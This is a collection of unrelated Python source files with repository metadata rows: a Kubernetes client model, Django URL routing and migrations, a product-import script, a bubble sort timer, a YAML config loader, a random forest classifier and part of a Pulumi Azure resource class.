def topology_key(self):
"""Gets the topology_key of this V1PodAffinityTerm. # noqa: E501
This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. # noqa: E501
:return: The topology_key of this V1PodAffinityTerm. # noqa: E501
:rtype: str
"""
return self._topology_key
@topology_key.setter
def topology_key(self, topology_key):
"""Sets the topology_key of this V1PodAffinityTerm.
This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed. # noqa: E501
:param topology_key: The topology_key of this V1PodAffinityTerm. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and topology_key is None: # noqa: E501
raise ValueError("Invalid value for `topology_key`, must not be `None`") # noqa: E501
self._topology_key = topology_key
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1PodAffinityTerm):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1PodAffinityTerm):
return True
return self.to_dict() != other.to_dict()
| [
"noreply@github.com"
] | jakedsouza.noreply@github.com |
43a1bcb706a6017d2eb7a5ce6899634284cba09e | e36c1798a2089a7a0a2a59a394ed8a025db8358b | /synbyt/urls.py | d8e21808edc495eaec82e093b6806bf32cf61bef | [] | no_license | actstylo/synbyt2 | d81286689051a02b34abd4890332e37f28b83b43 | d891a4d1bc460a08157f7bfd6c44ab5d716ed726 | refs/heads/master | 2020-03-17T03:11:02.908786 | 2018-05-13T09:42:35 | 2018-05-13T09:42:35 | 133,224,086 | 1 | 0 | null | 2018-05-13T09:46:05 | 2018-05-13T09:46:04 | null | UTF-8 | Python | false | false | 2,382 | py | from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
from synbytapp import views
from accounts import views as accounts_views
from django.conf.urls import (
handler400, handler403, handler404, handler500
)
handler400 = 'synbytapp.views.bad_request'
handler403 = 'synbytapp.views.permission_denied'
handler404 = 'synbytapp.views.page_not_found'
handler500 = 'synbytapp.views.server_error'
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.home, name='home'),
url(r'^about/$', views.about, name='about'),
url(r'^support/$', views.support, name='support'),
url(r'^terms/$', views.terms_of_use, name='terms_of_use'),
url(r'^contact/$', accounts_views.contact, name='contact'),
url(r'^success/$', accounts_views.successView, name='success'),
url(r'^login/$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
url(r'^signup/$', accounts_views.signup, name='signup'),
url(r'^logout/$', auth_views.LogoutView.as_view(), name='logout'),
url(r'^reset/$',
auth_views.PasswordResetView.as_view(
template_name='password_reset.html',
email_template_name='password_reset_email.html',
subject_template_name='password_reset_subject.txt'
), name='password_reset'),
url(r'^reset/done/$',
auth_views.PasswordResetDoneView.as_view(template_name='password_reset_done.html'),
name='password_reset_done'),
url(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
auth_views.PasswordResetConfirmView.as_view(template_name='password_reset_confirm.html'),
name='password_reset_confirm'),
url(r'^reset/complete/$',
auth_views.PasswordResetCompleteView.as_view(template_name='password_reset_complete.html'),
name='password_reset_complete'),
url(r'^settings/password/$', auth_views.PasswordChangeView.as_view(template_name='password_change.html'),
name='password_change'),
url(r'^settings/password/done/$', auth_views.PasswordChangeDoneView.as_view(template_name='password_change_done.html'),
name='password_change_done'),
]
if settings.DEBUG:
urlpatterns = urlpatterns + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"spaceled@gmail.com"
] | spaceled@gmail.com |
2409997bcdd70bd01cfbf1426549351da8a013c4 | 8fcfb384245d9b36a6c5a3bab55dc3101da52627 | /App_login/migrations/0001_initial.py | 5dc2222836670c23baaae5e019a21f9a06600ef9 | [] | no_license | Maloy-Baroi/Kashfi-Jakaria | faa96e874cae8132ddb3117de0fe1c756b570da5 | ea574b4bdc5a2dd15c02c2f9bcc9e339982841b7 | refs/heads/main | 2023-04-27T19:20:03.199894 | 2021-05-01T16:11:29 | 2021-05-01T16:11:29 | 363,450,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,321 | py | # Generated by Django 3.2 on 2021-04-07 02:42
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='EmployeeID',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ids', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('employee_id', models.CharField(max_length=20, unique=True)),
('profile_picture', models.ImageField(upload_to='librarian_photo')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"teamexplorer171@gmail.com"
] | teamexplorer171@gmail.com |
57b2cd00a87e389e7a38f77e87aeadee7dc8413d | a0a0932b6ab6ec47c2757d8929216790f5bc6535 | /import_productitem.py | 7c614f08aadb009ebc8072d22b30f9530d115aa9 | [] | no_license | lianglunzhong/latte-erp | b4e6e3b13c4bce17911ff166fecc36172e0bea5b | b58936c8d9917f3efdcb3585c54bfd3aba4723c2 | refs/heads/master | 2022-11-27T03:08:23.780124 | 2017-04-28T02:51:43 | 2017-04-28T02:51:43 | 89,660,834 | 0 | 0 | null | 2022-11-22T01:04:12 | 2017-04-28T02:48:50 | Python | UTF-8 | Python | false | false | 3,751 | py | # -*- coding: utf-8 -*-
import datetime
from django.utils import timezone
import sys, os
reload(sys)
sys.setdefaultencoding('utf-8')
import csv
sys.path.append(os.getcwd())
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
import django
django.setup()
from product.models import *
from order.models import *
# 根据产品和产品属性生成属性产品
products = Product.objects.all().order_by('id')
# products = Product.objects.filter(id=5393)
for p in products:
# print 'cate',p.category_id,p.description
category = Category.objects.get(pk=p.category_id)
# 更新产品sku编码
# p.sku = str(category.code)+str(p.id)
# p.sku = u"%s%06d" % (category.code, p.id)
# p.save()
# for attribute in category.attributes.all().exclude(id=11):
# # print 'attr_id',attribute.id
# product_attribute, is_created = ProductAttribute.objects.get_or_create(attribute_id=attribute.id,product_id=p.id)
product_attributes = ProductAttribute.objects.filter(product_id=p.id).exclude(attribute_id=11)
for product_attribute in product_attributes:
# print product_attribute.attribute_id
options = p.description.split('#')
for opx in options:
op = opx.replace('SIZE:', '').replace(' ', '').strip().upper()
if "ONE" in op:
op = 'ONESIZE'
elif not op:
op = 'ONESIZE'
print 'not op', opx
elif op in ('????', "均码",'???','error'):
op = 'ONESIZE'
print 'is ?', opx
elif op == 'X':
op = "XL"
elif len(op) == 3 and op[1:] == 'XL' and op[0] != 'X':
try:
op = int(op[0]) * 'X' + 'L'
except Exception,e:
print opx,'#', p.id,'#', p.sku,'#', p.choies_sku
# print 'op',op
try:
option = Option.objects.get(name=op,attribute_id=product_attribute.attribute_id)
product_attribute.options.add(option)
# # item_str = str(p.id) +'-0-'+str(option.id)
# item_str = str(p.id) +'-'+str(option.id)
# # item_sku = u"%s-0-%s"% (p.sku,option.name)
# item_sku = u"%s%s"% (p.sku,option.code)
# item, is_created = Item.objects.get_or_create(product_id=p.id, key=item_str,sku=item_sku)
# # print 'item_str',item_str
# # 针对ws系统下的sku生成choies渠道的别名
# sku_str = str(p.choies_sku)+'-'+str(option.name)
# # print 'sku_str',sku_str,'item_id',item.id
# Alias.objects.get_or_create(sku=sku_str,channel_id=1,item_id=item.id)
except Exception,e:
print opx,'#', p.id,'#', p.sku,'#', p.choies_sku,'# save no',e
exit()
# 获取产品表中现所有的分类及分类属性选项
products = Product.objects.filter(id__gte=306).values('category_id','description').distinct()
temp = {}
i=0
for p in products:
# print p
i= i+1
# print p.category_id,p.description
if temp.has_key(p['category_id']):
temp[p['category_id']] = temp[p['category_id']] + '#'+p['description']
else:
temp[p['category_id']] = p['description']
fieldnames = ['分类id', '属性选项']
dict_writer = csv.writer(open('category_data.csv','wb'))
dict_writer.writerow(fieldnames)
for key,value in temp.iteritems():
temp[key] = value.split('#')
temp[key] = list(set(temp[key]))
cate = Category.objects.filter(id=key,id__gte=354).values('name')
print cate[0]['name']
temp2 = [key, cate[0]['name'], '#'.join(str(e) for e in temp[key])]
dict_writer.writerow(temp2)
print temp
exit()
| [
"liang.lunzhong@wxzeshang.com"
] | liang.lunzhong@wxzeshang.com |
422b9b9dea57e7b36524f766a58b150170c93d89 | 68fd6dedf67e67f567475b06dd209b1c62a4c1aa | /app.py | a8d7a4cb550323ef5a9c361db2b0b44aeda04bf0 | [] | no_license | cassandrazhou/bubble_sort | 766b1fd6dafa47808a5f878dd66bbf890da78f58 | 8b2480df5d72bba8a7565b9b9aa3f8ab6e902a21 | refs/heads/main | 2023-07-08T05:53:22.855317 | 2021-08-21T13:57:04 | 2021-08-21T13:57:04 | 398,570,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import bubble_sort
import time
L = [2, 5, 31, 6, 8, 4, 7, 9, 1, 42, 52, 35, 100, 11, 0, 13, 19, 71, 47, 3089, 231, 482, 91238, 432, 43, 6, 87, 33, 57, 981, 24, 19, 22, 1001]
start_long = time.time()
bubble_sort.BubbleSort_long(L)
end_long = time.time()
print("The LONG version of BubbleSort took {} seconds.".format(end_long - start_long))
start_short = time.time()
bubble_sort.BubbleSort_short(L)
end_short = time.time()
print("The SHORT version of BubbleSort took {} seconds.".format(end_short - start_short)) | [
"noreply@github.com"
] | cassandrazhou.noreply@github.com |
b2221a99054c2bd032ff2e756d2c70e772bb434b | 233b2958c853dc57dfa5d54caddbc1520dcc35c8 | /ava/runtime/config.py | 4e76f2a43ffde0aeb8268ac973bff3b13fc8e9f6 | [] | no_license | eavatar/ava.node | 6295ac6ed5059ebcb6ce58ef6e75adf1bfa24ed7 | 71e3304d038634ef13f44d245c3838d276a275e6 | refs/heads/master | 2021-01-19T06:13:01.127585 | 2015-06-03T03:10:59 | 2015-06-03T03:10:59 | 33,645,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | # -*- coding: utf-8 -*-
"""
Configuration file reading/writing.
"""
from __future__ import absolute_import, division, print_function, \
unicode_literals
import codecs
import logging
import logging.config
import os.path
from string import Template
from yaml import load, dump
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from ava.runtime import environ
AGENT_CONF = os.path.join(environ.conf_dir(), u'ava.yml')
# The default configuration file is located at the base directory.
settings = dict(base_dir=environ.base_dir(),
conf_dir=environ.conf_dir(),
data_dir=environ.data_dir(),
pkgs_dir=environ.pkgs_dir(),
logs_dir=environ.logs_dir(),
mods_dir=environ.mods_dir(),
)
def load_conf(conf_file):
if not os.path.exists(conf_file):
return {}
data = codecs.open(conf_file, 'rb', encoding='utf-8').read()
if len(data.strip()) == 0:
return {}
template = Template(data)
data = template.substitute(**settings)
return load(data, Loader=Loader)
def save_conf(conf_file, content):
out = codecs.open(conf_file, 'wb', encoding='utf-8')
out.write(dump(content, Dumper=Dumper, default_flow_style=False,
indent=4, width=80))
settings.update(load_conf(AGENT_CONF))
# configure logging
logging.config.dictConfig(settings['logging'])
| [
"sam@eavatar.com"
] | sam@eavatar.com |
dcd47627904d58842a015087332ea70bcf3781d8 | 62d61baf359eefbd77ca630bac3042132f41e710 | /randomforest.py | 36e3502ed48c5c7053ed59f32178d6592ce24dd9 | [] | no_license | garou99/petadoption | 6723084b862561eb5377a49f0066b4405ee8a7de | a84f934256d2367964abe177bda95dbe3796e856 | refs/heads/master | 2023-03-12T06:16:03.703674 | 2021-02-20T17:19:45 | 2021-02-20T17:19:45 | 340,438,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset1=pd.read_csv("train.csv")
dataset2=pd.read_csv("test.csv")
y1=dataset1["breed_category"]
y2=dataset1["pet_category"]
dataset1.drop(["breed_category","pet_category"],axis=1,inplace=True)
dataset=pd.concat((dataset1,dataset2)).reset_index(drop=True)
dataset.drop(["pet_id"],axis=1,inplace=True)
#print(dataset["condition"].value_counts())
dataset['condition'].fillna(-1,inplace=True)
dataset['issue_date']=pd.to_datetime(dataset['issue_date'])
dataset['listing_date']=pd.to_datetime(dataset['listing_date'])
x=[]
for d in dataset['issue_date']:
x.append(d.month)
dataset['issue_month']=x
x=[]
for d in dataset['listing_date']:
x.append(d.month)
dataset['listing_month']=x
x=[]
for d in dataset['issue_date']:
x.append(d.year+(d.month/12.0)+(d.day/365.0))
dataset['issue_date']=x
x=[]
for d in dataset['listing_date']:
x.append(d.year+(d.month/12.0)+(d.day/365.0))
dataset['listing_date']=x
dataset['time']=abs(dataset['listing_date']-dataset['issue_date'])
dataset.drop(['listing_date','issue_date'],axis=1,inplace=True)
dataset['color_type']=pd.get_dummies(dataset['color_type'])
train=dataset.iloc[:,:].values
from sklearn.preprocessing import StandardScaler
sc_x=StandardScaler()
dataset=sc_x.fit_transform(dataset)
from sklearn.model_selection import train_test_split
xtrain,xtest,ytrain,ytest=train_test_split(dataset[:18834],y1,test_size=0.2)
from sklearn.ensemble import RandomForestClassifier
classifier=RandomForestClassifier(n_estimators=10,criterion="entropy",random_state=0)
classifier.fit(xtrain,ytrain)
ypredict=classifier.predict(xtest)
from sklearn.metrics import classification_report,confusion_matrix
print(classification_report(ytest,ypredict)) | [
"vaibhavvashist9999@gmail.com"
] | vaibhavvashist9999@gmail.com |
6fe1caf5a0fd9e62133dffde475eb704b5b0b5ee | 6d9112d77b2864ac2d4b8b3135149f1c8eb07901 | /leadership_styles/migrations/0001_initial.py | c4b1c9c95e1993a8180603efaf6d4fc64868b520 | [] | no_license | predictable-success/predictable_success | 77b880cefe0fe363572bc43f72ac558c405c820e | 7cdbdcd5686781b4ac8bf4a3cd60c34ac4cee0f5 | refs/heads/master | 2021-01-19T01:09:10.251217 | 2017-05-05T17:39:29 | 2017-05-05T17:39:29 | 64,931,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,323 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('org', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField(default=b'', blank=True)),
('leadership_style', models.IntegerField(choices=[(0, b'Visionary'), (1, b'Operator'), (2, b'Processor'), (3, b'Synergist')])),
('order', models.IntegerField(default=0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EmployeeLeadershipStyle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(default=datetime.datetime.now)),
('times_retaken', models.IntegerField(default=0)),
('notes', models.TextField(default=b'', blank=True)),
('is_draft', models.BooleanField(default=False)),
('active', models.BooleanField(default=False)),
('completed', models.BooleanField(default=False)),
('visionary_score', models.IntegerField()),
('operator_score', models.IntegerField()),
('processor_score', models.IntegerField()),
('synergist_score', models.IntegerField()),
('answers', models.ManyToManyField(related_name='+', null=True, to='leadership_styles.Answer', blank=True)),
('assessor', models.ForeignKey(related_name='+', to='org.Employee')),
('employee', models.ForeignKey(related_name='employee_leadership_styles', to='org.Employee')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('randomize_answers', models.BooleanField(default=False)),
('randomize_next_questions', models.BooleanField(default=False)),
('order', models.IntegerField(default=0)),
('previous_question', models.ForeignKey(related_name='next_questions', blank=True, to='leadership_styles.Question', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='employeeleadershipstyle',
name='last_question_answered',
field=models.ForeignKey(related_name='+', blank=True, to='leadership_styles.Question', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='answer',
name='question',
field=models.ForeignKey(related_name='_answers', to='leadership_styles.Question', null=True),
preserve_default=True,
),
]
| [
"mcmahon.nate@gmail.com"
] | mcmahon.nate@gmail.com |
23ff794c191939821dfe1e0a1e6ee0c35f90e884 | e5e2b7da41fda915cb849f031a0223e2ac354066 | /sdk/python/pulumi_azure_native/desktopvirtualization/v20201019preview/application_group.py | 2faebd8d2ef7474036d1b9203e874ce21b32a2a9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | johnbirdau/pulumi-azure-native | b7d3bdddeb7c4b319a7e43a892ddc6e25e3bfb25 | d676cc331caa0694d8be99cb90b93fa231e3c705 | refs/heads/master | 2023-05-06T06:48:05.040357 | 2021-06-01T20:42:38 | 2021-06-01T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,527 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = ['ApplicationGroupArgs', 'ApplicationGroup']
@pulumi.input_type
class ApplicationGroupArgs:
def __init__(__self__, *,
application_group_type: pulumi.Input[Union[str, 'ApplicationGroupType']],
host_pool_arm_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
application_group_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ApplicationGroup resource.
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "application_group_type", application_group_type)
pulumi.set(__self__, "host_pool_arm_path", host_pool_arm_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if application_group_name is not None:
pulumi.set(__self__, "application_group_name", application_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if friendly_name is not None:
pulumi.set(__self__, "friendly_name", friendly_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Input[Union[str, 'ApplicationGroupType']]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@application_group_type.setter
def application_group_type(self, value: pulumi.Input[Union[str, 'ApplicationGroupType']]):
pulumi.set(self, "application_group_type", value)
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Input[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@host_pool_arm_path.setter
def host_pool_arm_path(self, value: pulumi.Input[str]):
pulumi.set(self, "host_pool_arm_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="applicationGroupName")
def application_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the application group
"""
return pulumi.get(self, "application_group_name")
@application_group_name.setter
def application_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> Optional[pulumi.Input[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@friendly_name.setter
def friendly_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "friendly_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ApplicationGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param ApplicationGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_name"] = application_group_name
if application_group_type is None and not opts.urn:
raise TypeError("Missing required property 'application_group_type'")
__props__.__dict__["application_group_type"] = application_group_type
__props__.__dict__["description"] = description
__props__.__dict__["friendly_name"] = friendly_name
if host_pool_arm_path is None and not opts.urn:
raise TypeError("Missing required property 'host_pool_arm_path'")
__props__.__dict__["host_pool_arm_path"] = host_pool_arm_path
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210401preview:ApplicationGroup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ApplicationGroup, __self__).__init__(
'azure-native:desktopvirtualization/v20201019preview:ApplicationGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationGroup':
"""
Get an existing ApplicationGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_type"] = None
